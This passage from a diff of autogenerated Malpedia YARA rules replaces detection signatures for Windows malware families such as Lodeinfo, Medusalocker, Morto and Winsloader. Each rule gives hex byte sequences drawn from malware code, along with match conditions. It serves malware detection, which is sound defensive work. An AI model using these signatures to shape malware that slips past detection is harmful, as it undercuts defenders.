"efd4cdc341dd3e728319b10f2fc1071c2f12b6836d6f2ac31876c93b1c888c11" + logic_hash = "05a94cf7e4fffe2d3333c852ee9c9ff577487ed8e4c35b0a2c90ccf7655ac3b0" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -171853,32 +174562,43 @@ rule MALPEDIA_Win_Latentbot_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 48 89742430 4c 892424 4c 8b6118 44 } - $sequence_1 = { 833a00 7410 49 8b0a } - $sequence_2 = { 90 0fb7c0 8d68bf 6683fd19 7703 83c020 0fb7c0 } - $sequence_3 = { c16d5008 836d5808 888c3020290000 eb12 8b4554 8a00 8b4d4c } - $sequence_4 = { 59 6a46 eb05 6a30 59 6a39 58 } - $sequence_5 = { 33c9 03f0 13ca 33c0 0375f8 } - $sequence_6 = { 56 0fb730 6683fe41 720c 6683fe5a 7706 83c620 } - $sequence_7 = { 837d4c00 8b5d68 0f8408030000 c70624000000 e9???????? } - $sequence_8 = { 33c9 51 890e 8bdc 52 6a40 } - $sequence_9 = { 8d45cf 897e04 8bd1 2bc1 881c10 4a 75fa } + $sequence_0 = { 56 c706ffffffff e8???????? 83c404 } + $sequence_1 = { 53 50 ff15???????? 3dffffff00 } + $sequence_2 = { ff15???????? 8bf0 85f6 7513 8b45d8 } + $sequence_3 = { 68???????? 50 ff15???????? 8b0d???????? 8b35???????? 890d???????? 68???????? } + $sequence_4 = { 8945e0 8945e4 8945e8 b802000000 } + $sequence_5 = { ff15???????? 6a10 8d4ddc 8bf0 51 56 ff15???????? } + $sequence_6 = { 8b95d4feffff 52 6a00 68ffff1f00 ffd7 } + $sequence_7 = { e8???????? 83ec1c 8bcc 89642430 6aff 53 } + $sequence_8 = { 52 56 50 e8???????? 8bf0 eb02 } + $sequence_9 = { 57 e8???????? 6a01 6a00 6a00 ff15???????? } + $sequence_10 = { 33c0 5f c3 56 ff15???????? 57 8b3d???????? } + $sequence_11 = { 8b45d8 8b4818 8b5104 50 8955e0 } + $sequence_12 = { 890d???????? 68???????? 41 50 a3???????? } + $sequence_13 = { 488bf9 33d2 33c9 e8???????? 488d0d74e90100 4885c0 480f44c1 } + $sequence_14 = { 488d15fe730200 488d4c2450 e8???????? 90 41b902000000 } + $sequence_15 = { 0f8333010000 488d4550 483bf0 0f8726010000 } + $sequence_16 = { 488b0b e8???????? 48c743180f000000 48c7431000000000 c60300 8bc7 488b4c2438 } + $sequence_17 = { 4883ec40 48c7442428feffffff 48895c2460 4889742468 488b05???????? } + $sequence_18 = { 488d0527dd0100 488981b8000000 4883a17004000000 b90d000000 } + $sequence_19 = { 488d4c2470 e8???????? 85c0 750a b902020208 } + $sequence_20 = { b902010209 e8???????? 90 48837b1810 } condition: - 7 of them and filesize <401408 + 7 of them and filesize <614400 } -rule MALPEDIA_Win_Lodeinfo_Auto : FILE +rule MALPEDIA_Win_Skyplex_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "47c099ff-69db-5812-85ce-57e24072ce38" + id = "3d9ea458-10c2-53d2-a125-12c3c77bb27b" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lodeinfo" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lodeinfo_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.skyplex" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.skyplex_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "e6a58ad7e2bc0ff5d6e63ebfb8b716b1912a0a95e296af817067906fecf4c3bd" + logic_hash = "d0704b78b2354a7199559252cd2d4f927c47dc758745bd631528996f74a24c6c" score = 75 quality = 75 tags = "FILE" @@ -171892,32 +174612,32 @@ rule MALPEDIA_Win_Lodeinfo_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 894de0 8955f0 8955f8 8955f4 85ff 740a 381433 } - $sequence_1 = { 85c0 7412 ff75f4 8b55f0 8bc8 e8???????? 83c404 } - $sequence_2 = { 85ff 742e 8b4c2444 8bc7 } - $sequence_3 = { 660fefc8 0f114c0620 0f10440630 0f28ca 660fefc8 0f114c0630 83c040 } - $sequence_4 = { 5d c3 8b75fc 8b55f0 33c9 85d2 7429 } - $sequence_5 = { 8bda 8b5508 57 8bf9 895df8 8b06 } - $sequence_6 = { e8???????? 83c404 894708 85c0 750d 39460c 7408 } - $sequence_7 = { 03c8 8b4510 d1e9 024fff 884c17ff 8b4dd4 3bf3 } - $sequence_8 = { eb72 8b45f0 8975f4 c64406ff00 eb65 8b45f8 8d7e01 } - $sequence_9 = { 85c0 748e 33c0 0f57c0 b920010000 8bfa } + $sequence_0 = { 6a00 ff15???????? 898508fcffff ff15???????? } + $sequence_1 = { c3 8bff 56 57 33ff 8db704984100 ff36 } + $sequence_2 = { 59 e9???????? 8b36 8bce c1f905 8b0c8dc0af4100 } + $sequence_3 = { 8b7d08 8bc7 c1f805 8d3485c0af4100 8b06 } + $sequence_4 = { 50 e8???????? 50 8b4df8 8b11 8b45f8 50 } + $sequence_5 = { c785b8f6ffff684c4100 c785bcf6ffffb04c4100 ff15???????? 50 e8???????? 83c404 } + $sequence_6 = { 33d2 b9???????? 57 8bc2 c1f805 8b0485c0af4100 8bfa } + $sequence_7 = { 83bdf0feffff03 7327 8b85f0feffff 8b0c857c904100 51 } + $sequence_8 = { 66898c4558f7ffff 8d9558f7ffff 52 8d8540fbffff 50 } + $sequence_9 = { 6a01 ff15???????? c78544f6ffff01000000 eb0f 8b8d44f6ffff 83c101 898d44f6ffff } condition: - 7 of them and filesize <712704 + 7 of them and filesize <262144 } -rule MALPEDIA_Win_Lock_Pos_Auto : FILE +rule MALPEDIA_Win_Cheesetray_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "d847ae83-76cd-5967-803e-bdb0585a6606" + id = "eb62b85d-8cb5-5c93-9081-d14aeb9fbc65" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lock_pos" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lock_pos_auto.yar#L1-L140" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cheesetray" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cheesetray_auto.yar#L1-L133" license_url = "N/A" - logic_hash = "36f811da9c497d4d7cb3a11de01255e73f7c0aa2aa971faa2dbafeeb60cefda6" + logic_hash = "191172cf0a118bdd8e29d678be92e505a1f63a7f2bef651373f2b7d4a4b3676d" score = 75 quality = 75 tags = "FILE" @@ -171931,35 +174651,32 @@ rule MALPEDIA_Win_Lock_Pos_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8bec 8b4508 8b0d???????? 8b0481 } - $sequence_1 = { 55 8bec 837d0800 7704 } - $sequence_2 = { 55 8bec 81eca4040000 56 } - $sequence_3 = { 8d85f8fdffff 50 6a00 6a00 6a23 6a00 ff15???????? } - $sequence_4 = { 0fb64dfb 85c9 741c 8b5514 8b45fc } - $sequence_5 = { 2bc8 c745fc04000000 8a1401 8810 40 } - $sequence_6 = { 8b55f8 8b4508 8910 8b45c4 } - $sequence_7 = { 3bc6 0f85a1000000 32db e8???????? 84db } - $sequence_8 = { 8b55fc 8b450c 0fb70c50 334d14 } - $sequence_9 = { 33c9 84c0 0f95c1 41 51 ff75e4 } - $sequence_10 = { 894dfc 8b55dc 83c201 8955dc ebd2 8b45f8 } - $sequence_11 = { e8???????? 83c408 8d9568ffffff 52 e8???????? 83c404 50 } - $sequence_12 = { 50 eb4b 8b45f8 3bc3 764e 03c7 } + $sequence_0 = { 66898424c4000000 e8???????? 8b4d08 83c40c 51 8d54240c 33c0 } + $sequence_1 = { c20c00 397368 740e 56 e8???????? 83c404 83f8ff } + $sequence_2 = { 03cf 8988bc160000 8b3cb5f0234400 8b5d08 85ff 0f8487fdffff 2b14b5282d4400 } + $sequence_3 = { 8bf8 85ff 745d 0fb755f0 8b45ec 52 50 } + $sequence_4 = { e8???????? 8b442434 3bc7 7403 50 ffd6 } + $sequence_5 = { 8d0c00 8d442428 50 52 e8???????? 83c408 894608 } + $sequence_6 = { 8bda c1eb18 33049da02d4400 81e2ff000000 330495a0394400 83c120 3341f8 } + $sequence_7 = { 8b4dfc 5f 5e a3???????? 890d???????? b801000000 5b } + $sequence_8 = { e8???????? 8b45f8 83c40c 53 53 8d4dec 51 } + $sequence_9 = { 83c410 33c0 5f 66398500ffffff 740c 40 6683bc4500ffffff00 } condition: - 7 of them and filesize <319488 + 7 of them and filesize <8626176 } -rule MALPEDIA_Win_Webmonitor_Auto : FILE +rule MALPEDIA_Win_Medusalocker_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "aca2309c-f3e7-5982-bcd7-9e22f09c3e41" + id = "ffdd3261-a5ad-520b-a2bf-3c67ba3f2e25" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webmonitor" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.webmonitor_auto.yar#L1-L158" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.medusalocker" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.medusalocker_auto.yar#L1-L127" license_url = "N/A" - logic_hash = "7913959618328b6198214b581f33ca34a8ffc8b00c2415ca23bf0e5f2e066370" + logic_hash = "1d388adf94671d416a3d4bdcd878fd62d77b06e7650d468b56f2c1b04655aed4" score = 75 quality = 75 tags = "FILE" @@ -171973,40 +174690,34 @@ rule MALPEDIA_Win_Webmonitor_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 06 000b 3a58ff 1b03 fd 006cff1e e00e } - $sequence_1 = { 41 0080cd41009c d34100 e8???????? } - $sequence_2 = { 0094be4100d891 41 0084e84100a872 42 00a06a4200f8 } - $sequence_3 = { 0028 fa 41 0014b4 42 } - $sequence_4 = { b9???????? ffe1 ba???????? b9???????? ffe1 ba???????? b9???????? } - $sequence_5 = { 000e 6c 74ff f5 } - $sequence_6 = { ff05???????? 000d???????? 04b8 fe04e4 fd 04e0 fd } - $sequence_7 = { 00dc 7442 000477 42 0028 } - $sequence_8 = { 00e8 dd7000 008bf98b5d1c 8d4de4 } - $sequence_9 = { 00d1 6848007269 48 00856948008b } - $sequence_10 = { 0108 eb5a 8b4508 83ceff } - $sequence_11 = { 0108 8b442410 891e 894604 } - $sequence_12 = { 00d1 6848004069 48 00d1 } - $sequence_13 = { 000f b681 fc b84500ff24 } - $sequence_14 = { 00e8 f61c00 008bd9895df0 8b451c } - $sequence_15 = { 00856948008b ff558b ec 83ec0c } + $sequence_0 = { e8???????? 8945e8 eb07 c745e800000000 8b4de8 894de4 c645fc02 } + $sequence_1 = { 8b4dd4 e8???????? 83c048 50 8d55d8 } + $sequence_2 = { e8???????? 33c0 8845bb c745c488020000 6888020000 e8???????? 83c404 } + $sequence_3 = { 83c404 8b08 51 e8???????? 83c410 } + $sequence_4 = { 8845d7 8b4d08 e8???????? 0fb6c8 85c9 0f85f6000000 8b5508 } + $sequence_5 = { 8d45e8 50 8b4d0c 51 e8???????? 83c404 50 } + $sequence_6 = { 33c0 8945e8 668945ec b902000000 6bd100 668b450c } + $sequence_7 = { 894508 8b4d08 3b4d0c 7427 8b5508 } + $sequence_8 = { 8965d8 8b45e4 83c00c 50 e8???????? e8???????? 8b4de4 } + $sequence_9 = { 8b55e0 52 6a01 8b4df0 e8???????? c645fc03 8d8d38ffffff } condition: - 7 of them and filesize <1867776 + 7 of them and filesize <1433600 } -rule MALPEDIA_Win_Ransoc_Auto : FILE +rule MALPEDIA_Win_Soul_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "961c0c93-e6c6-5111-8367-8742ed436406" + id = "ea0bc590-52b0-5914-b399-85653bff4505" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransoc" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ransoc_auto.yar#L1-L122" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.soul" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.soul_auto.yar#L1-L234" license_url = "N/A" - logic_hash = "2d366ed2132c1270c1bab4c471d75e367a89089f653123f697fac204fd95b124" + logic_hash = "192d2467d64d6ffcab9581013b65d7e42a7f1082991c14dd63a3ef2c42177610" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -172018,34 +174729,47 @@ rule MALPEDIA_Win_Ransoc_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b573c 50 57 ffd2 ff4e3c 8b462c 8b4e3c } - $sequence_1 = { 8bf0 8b5630 57 8d7e30 } - $sequence_2 = { 894240 8b5040 895140 3bd7 741e } - $sequence_3 = { 89703c 8b5134 895030 3bd7 7406 8b5134 } - $sequence_4 = { 85c0 75f2 8b7140 85f6 758b 68???????? } - $sequence_5 = { 740f 83f907 740a 83f906 } - $sequence_6 = { 89462c a820 7406 8b4604 014804 8b462c a900080000 } - $sequence_7 = { 895148 8b4830 85c9 7406 8b5034 895134 8b4834 } - $sequence_8 = { 83c408 c3 6a00 6a01 55 } - $sequence_9 = { 8b56e4 89542414 8d5c2410 891a 89442410 8b5004 8956e4 } + $sequence_0 = { 83c404 33f6 897304 8b4304 } + $sequence_1 = { 897304 8b4304 5f 5e 5b } + $sequence_2 = { 40 803800 75f8 c745fc00000000 90 } + $sequence_3 = { 75f8 803e00 8bc6 7409 90 fe08 40 } + $sequence_4 = { d3e2 8515???????? 7405 e8???????? } + $sequence_5 = { 8b03 8b36 50 e8???????? 8bf8 } + $sequence_6 = { 5d c3 57 eb05 85f6 } + $sequence_7 = { ff25???????? ff25???????? ff25???????? ff25???????? 48895c2408 4889742410 57 } + $sequence_8 = { ff45fc 85f6 7506 837dfc04 7cda } + $sequence_9 = { c745fc00000000 8da42400000000 8b4df8 51 } + $sequence_10 = { e9???????? 8b531c c1e002 8bc8 } + $sequence_11 = { 6644896c2438 48837f1808 7319 4c8b4710 49ffc0 4d03c0 } + $sequence_12 = { 4983fc08 7208 498bcd e8???????? b801000000 488b8db0010000 4833cc } + $sequence_13 = { 7475 453bcc 7370 488b5330 4c8b5318 488b7338 } + $sequence_14 = { 48895c2420 ff16 85c0 0f85f7000000 488b442420 4885c0 0f84e4000000 } + $sequence_15 = { 4c8bac2470020000 4c8ba42478020000 488bb424a8020000 488b9c2498020000 488bac24a0020000 488b8c2460020000 4833cc } + $sequence_16 = { 8bc1 c1e805 478d541201 662bc8 } + $sequence_17 = { 0f8889000000 7e74 817d0063736de0 7528 48833d????????00 741e 488d0d49ad0000 } + $sequence_18 = { 3d06010000 7309 4585ff 0f84bd020000 85c0 0f8410040000 458bc5 } + $sequence_19 = { 4883c302 85c0 75ed 85d2 7416 4885ff } + $sequence_20 = { 488bcf ff15???????? 400fb6de 85c0 be00000000 0f44de 48837c247808 } + $sequence_21 = { 488d4de0 e8???????? 90 4c8d056e310200 488bd0 488d4db8 } + $sequence_22 = { 41d3ed 83ff20 7321 85f6 0f84d30c0000 410fb60424 } condition: - 7 of them and filesize <958464 + 7 of them and filesize <1400832 } -rule MALPEDIA_Win_Redalpha_Auto : FILE +rule MALPEDIA_Win_Calmthorn_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "18d7b39f-1fe8-5b57-91e8-72bb40b0300f" + id = "8cbb3f25-515c-5fed-8b4e-4a931d9bfb1a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.redalpha" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.redalpha_auto.yar#L1-L286" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.calmthorn" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.calmthorn_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "062f534aa7bc989cb92a0f507bdc74bdcfcc089d3142c94dc9dd9b9510e4dbdc" + logic_hash = "98170ddc8dfcd366956427aafd69264166f05ad426e5dc909d0630e51620ea92" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -172057,53 +174781,32 @@ rule MALPEDIA_Win_Redalpha_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 83c40c c0e304 0fb6c3 50 } - $sequence_1 = { 8b3e 8bce e8???????? 8b4df8 } - $sequence_2 = { 4585c0 7417 0f1f4000 410fb602 4d8d5201 03c8 } - $sequence_3 = { 443bd3 7d0b 6645019489a40a0000 eb33 } - $sequence_4 = { 8b4004 c74408e840d24300 8b41e8 8b5004 } - $sequence_5 = { 8b3d???????? eb96 8b8b48010000 e8???????? 8bce e8???????? 8b7e04 } - $sequence_6 = { 8b3f ff750c 53 6aff } - $sequence_7 = { 8b3e 897df4 0fb607 0fb64f01 } - $sequence_8 = { 42803c0000 75f6 49ffc0 488d4f0d 488d542450 } - $sequence_9 = { e8???????? 488d043b 4d63c4 488d8dea020000 } - $sequence_10 = { 498d4505 894208 d3e5 ffcd 23dd } - $sequence_11 = { 488b4b10 488b5010 410fb60411 41880408 ff4328 ff4338 } - $sequence_12 = { 448d4858 e8???????? 85c0 7556 } - $sequence_13 = { 8b3e 8bcb d3e8 83e001 895d08 } - $sequence_14 = { 488d542458 4803d0 488bcb e8???????? } - $sequence_15 = { 8b3d???????? ffd7 ffb548f7ffff ffd7 } - $sequence_16 = { 50 e8???????? 83c418 c785f0fdffff00000000 8d85f0fdffff 50 6a0b } - $sequence_17 = { 0f8413050000 8b3c8d8c864000 85ff 755d 33c0 89859cf6ffff 89855cfcffff } - $sequence_18 = { c3 55 8bec 81ec04010000 56 68cf010040 6a00 } - $sequence_19 = { 8d7608 660fd60f 8d7f08 8b048d74e84000 } - $sequence_20 = { 50 8d45f4 64a300000000 683f000f00 } - $sequence_21 = { 897c2428 e8???????? 83c410 8d442424 50 } - $sequence_22 = { 50 e8???????? 6aff c645fc01 ff75dc } - $sequence_23 = { 8b5df4 8bf7 8b4b04 85c9 0f85f2000000 33c0 } - $sequence_24 = { 7605 e8???????? 8b4f14 8bf0 } - $sequence_25 = { e8???????? 83f801 7512 68d0070000 ff15???????? e8???????? eb39 } - $sequence_26 = { 7512 8b04bd30744100 807c302900 7504 } - $sequence_27 = { 8b8fbc000000 52 ff7730 8b01 ff5004 ff75ec } - $sequence_28 = { c1f806 83e13f 6bc930 53 56 8b048530744100 33db } - $sequence_29 = { 89b8bc000000 ff15???????? 894708 ff7518 8b4514 } - $sequence_30 = { 6bc830 894de0 8b049d581f4000 0fb6440828 83e001 7469 } + $sequence_0 = { c78548adffff00000000 eb0f 8b8548adffff 83c001 898548adffff 8b8d68f9ffff 51 } + $sequence_1 = { e8???????? 83c404 3985dcf3ffff 7d20 8b954cfaffff 83c201 89954cfaffff } + $sequence_2 = { 0f57c0 660f13857498ffff eb1e 8b957498ffff 83c201 8b857898ffff 83d000 } + $sequence_3 = { eb1e 8b85bc86ffff 83c001 8b8dc086ffff 83d100 8985bc86ffff 898dc086ffff } + $sequence_4 = { 8b959875ffff 83d200 898d9475ffff 89959875ffff 83bd9875ffff00 7722 720c } + $sequence_5 = { ebb7 0fb6952cfdffff 83fa01 7552 c7855cbdffff00000000 eb0f 8b855cbdffff } + $sequence_6 = { ebba 0fb68d5efdffff 83f901 7556 0f57c0 660f1385c472ffff eb1e } + $sequence_7 = { 8a95b7fdffff 80c201 8895b7fdffff ebbd 0fb6859efdffff 83f801 7552 } + $sequence_8 = { 8b8518f8ffff 0fbe08 85c9 7502 eb02 ebba 0fb69591fdffff } + $sequence_9 = { eb0f 8b8d34f0ffff 83c101 898d34f0ffff 8b9564f6ffff 52 e8???????? } condition: - 7 of them and filesize <606208 + 7 of them and filesize <2322432 } -rule MALPEDIA_Win_Reaver_Auto : FILE +rule MALPEDIA_Win_Morto_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "92b8afe7-b0ea-5ba5-8d5f-5512437f6132" + id = "b4e2fdf6-28d4-5bb0-a9a0-1ea448c5566e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.reaver" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.reaver_auto.yar#L1-L116" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.morto" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.morto_auto.yar#L1-L116" license_url = "N/A" - logic_hash = "8a78ae101ee8d9e477556b7d81328c10daa6a32306210d234ed44ad07120f4bd" + logic_hash = "a9b63fda2800565a4b4486897d85bf042e81c5ab64e52d3f79cf07bf3408f96f" score = 75 quality = 75 tags = "FILE" @@ -172117,34 +174820,34 @@ rule MALPEDIA_Win_Reaver_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff15???????? 85c0 7453 8d45f4 50 ff7508 } - $sequence_1 = { 50 ff7508 6a00 ff15???????? 85c0 7440 } - $sequence_2 = { ff15???????? 85c0 7453 8d45f4 } - $sequence_3 = { 85c0 7453 8d45f4 50 ff7508 } - $sequence_4 = { 85c0 7440 8b45f4 6a00 8945e8 } - $sequence_5 = { 85c0 7440 8b45f4 6a00 } - $sequence_6 = { 85c0 740d ff15???????? 3d14050000 7504 33c0 } - $sequence_7 = { 8bec 83ec1c 8d45fc 50 68ff010f00 } - $sequence_8 = { 8bec 83ec1c 8d45fc 50 68ff010f00 ff15???????? 50 } - $sequence_9 = { 85c0 740d ff15???????? 3d14050000 } + $sequence_0 = { 280c30 40 3b450c 72f4 8b4608 6a40 } + $sequence_1 = { 50 e8???????? 83c40c 8945e4 8d45cc } + $sequence_2 = { 03d0 8911 ffd2 5f 5e } + $sequence_3 = { 03f5 42 8a1e 46 } + $sequence_4 = { ff35???????? c745ec04000000 c745fce8030000 ff15???????? } + $sequence_5 = { 8bf0 c1ee08 83e601 8d3c56 } + $sequence_6 = { 41 8d441201 8bd0 c1ea08 83e201 a87f 8d3c7a } + $sequence_7 = { c745d0636c6965 c745d46e745c61 8945d8 c745dc44726f70 } + $sequence_8 = { 6802000080 ff55e0 85c0 755f 8d45f8 50 } + $sequence_9 = { 894dfc 895508 eb03 8b75f4 b980000000 33c0 8dbdf0fdffff } condition: - 7 of them and filesize <106496 + 7 of them and filesize <49152 } -rule MALPEDIA_Win_Jaku_Auto : FILE +rule MALPEDIA_Win_Gemcutter_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "2a488cc0-1b28-5098-bf2b-d901cf20342d" + id = "e94125d6-f7ee-5626-bb13-57f31cd4995b" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jaku" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.jaku_auto.yar#L1-L268" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gemcutter" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.gemcutter_auto.yar#L1-L128" license_url = "N/A" - logic_hash = "d05d79a0c954b2e0606ed773ff3f73ae5387638edb50352f452263cfa013d18a" + logic_hash = "cdd9767cb466abee0d56200d0aa911cbda817b83008ef2825b381668a5ec2a45" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -172156,51 +174859,32 @@ rule MALPEDIA_Win_Jaku_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b466c 234634 8b4e40 8b5644 668b7e6c 0fb70441 } - $sequence_1 = { 0f84d0000000 8b4d1c 8b550c 0fb709 0fb71c4a } - $sequence_2 = { c70610000000 eb1f 56 e8???????? 837d0c06 59 } - $sequence_3 = { e8???????? 59 894660 59 837e6003 0f8223010000 } - $sequence_4 = { 56 8b7510 57 6a08 33c0 59 } - $sequence_5 = { 8b96a4160000 8a0408 8b8ea0160000 66892c4a 8b8e98160000 } - $sequence_6 = { 6a0f 58 8d4dc6 8b17 } - $sequence_7 = { 83c41c 84c0 742b 8b450c 85c0 } - $sequence_8 = { 68???????? ff15???????? c3 b8???????? e8???????? 83ec2c } - $sequence_9 = { ff742408 e8???????? c20800 8bc1 } - $sequence_10 = { 5b c3 55 8bec 833d????????00 53 56 } - $sequence_11 = { 53 68000000a0 6a03 53 } - $sequence_12 = { 6a01 03c3 68???????? 50 e8???????? 83c40c 85c0 } - $sequence_13 = { 7507 b800308000 eb02 33c0 } - $sequence_14 = { 7508 83c8ff e9???????? 8b839f830000 } - $sequence_15 = { 75dd 57 e8???????? 59 } - $sequence_16 = { 55 56 57 6880020000 } - $sequence_17 = { 0245fd 3245fe 8a4dff d2c8 } - $sequence_18 = { 016c242c 8b44242c 5f 5e 5d } - $sequence_19 = { 50 e8???????? 59 8b4e2c } - $sequence_20 = { 85f6 b301 0f8491000000 56 e8???????? } - $sequence_21 = { e8???????? 59 eb57 53 } - $sequence_22 = { 56 e8???????? 59 8b4620 } - $sequence_23 = { 8d4608 57 e8???????? 8365e000 } - $sequence_24 = { e8???????? 8b7dd8 397de8 7593 6804010000 8d8574feffff 50 } - $sequence_25 = { a4 ff839f830000 8b839f830000 8b8b97830000 8901 33c0 40 } - $sequence_26 = { ff75f4 66899e4d720000 8d9e8f7e0000 53 81c6917e0000 } - $sequence_27 = { 6a00 e8???????? 50 e8???????? b001 8b55b4 64891500000000 } - $sequence_28 = { 6a00 53 e8???????? 0fbe532e } + $sequence_0 = { ff75fc ff15???????? eb09 ff75fc ff15???????? 3975fc } + $sequence_1 = { 8d8500fcffff 50 e8???????? 59 56 ff15???????? } + $sequence_2 = { 56 ffd7 53 56 56 56 } + $sequence_3 = { 59 53 50 ffd6 0fbe85f0f8ffff 50 } + $sequence_4 = { 6a01 ff15???????? 6a01 68???????? e8???????? 6a01 } + $sequence_5 = { 50 ff15???????? 83c420 8818 8d85f0fdffff 50 8d85f0f8ffff } + $sequence_6 = { 8d85f0fdffff 50 ffd7 8d85f0f8ffff 6800040000 50 } + $sequence_7 = { 8d45ac 56 50 e8???????? 83c40c 8d45f0 c745d801000000 } + $sequence_8 = { ff15???????? 85c0 0f84df000000 8d85f0f8ffff 68???????? 50 e8???????? } + $sequence_9 = { c3 55 8bec 81ec00040000 56 57 68???????? } condition: - 7 of them and filesize <2220032 + 7 of them and filesize <40960 } -rule MALPEDIA_Win_Graphite_Auto : FILE +rule MALPEDIA_Win_Winsloader_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "22d6771d-6e02-5bad-92aa-7abf2f0540bc" + id = "3816b057-ecfc-5190-8abf-a0a65a8930f8" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphite" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.graphite_auto.yar#L1-L109" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.winsloader" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.winsloader_auto.yar#L1-L171" license_url = "N/A" - logic_hash = "fac8314c02add0a1a3fcfc7bc6cd359f12eb58a8246911250bf475b51a803e3f" + logic_hash = "2eada578907b5f770ab8c1dc3588915ff9d4c97daa18d7827115e92744f234da" score = 75 quality = 75 tags = "FILE" @@ -172214,32 +174898,38 @@ rule MALPEDIA_Win_Graphite_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7513 33d2 e8???????? 84c0 } - $sequence_1 = { 33d2 e8???????? 84c0 74e4 } - $sequence_2 = { 81e2ff030000 81e1bf030000 83c940 c1e10a } - $sequence_3 = { 7513 33d2 e8???????? 84c0 74e4 } - $sequence_4 = { 81e1bf030000 83c940 c1e10a 0bca } - $sequence_5 = { ff15???????? 33c0 eb05 b801010000 } - $sequence_6 = { 85db 7513 33d2 e8???????? 84c0 74e4 } - $sequence_7 = { 85db 7513 33d2 e8???????? 84c0 } - $sequence_8 = { 85db 7513 33d2 e8???????? } - $sequence_9 = { 81e2ff030000 81e1bf030000 83c940 c1e10a 0bca } + $sequence_0 = { 83c40c 6800040000 8d8dfcf7ffff 51 } + $sequence_1 = { 8bf8 83c434 85ff 7510 } + $sequence_2 = { 89941d02fcffff 89841d06fcffff b8???????? 898c1d0afcffff 83c410 } + $sequence_3 = { 68???????? 51 